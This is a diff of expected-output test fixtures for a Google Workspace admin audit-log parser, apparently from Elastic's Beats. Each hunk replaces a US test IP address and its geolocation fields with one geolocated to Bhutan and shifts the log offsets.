-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -467,26 +435,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3917,
+        "log.offset": 3909,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -508,7 +472,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -525,26 +489,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4434,
+        "log.offset": 4425,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -566,7 +526,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -583,26 +543,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4963,
+        "log.offset": 4953,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -624,7 +580,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -640,26 +596,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 5481,
+        "log.offset": 5470,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -680,7 +632,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -692,26 +644,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6010,
+        "log.offset": 5998,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -732,7 +680,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -745,26 +693,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6385,
+        "log.offset": 6372,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -785,7 +729,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -801,26 +745,22 @@
         "google_workspace.organization.domain": "elastic.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 6802,
+        "log.offset": 6788,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -841,7 +781,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -853,26 +793,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7356,
+        "log.offset": 7341,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -893,7 +829,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -905,26 +841,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7746,
+        "log.offset": 7730,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -946,7 +878,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -963,26 +895,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 8134,
+        "log.offset": 8117,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1004,7 +932,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1023,26 +951,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 8652,
+        "log.offset": 8634,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1064,7 +988,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
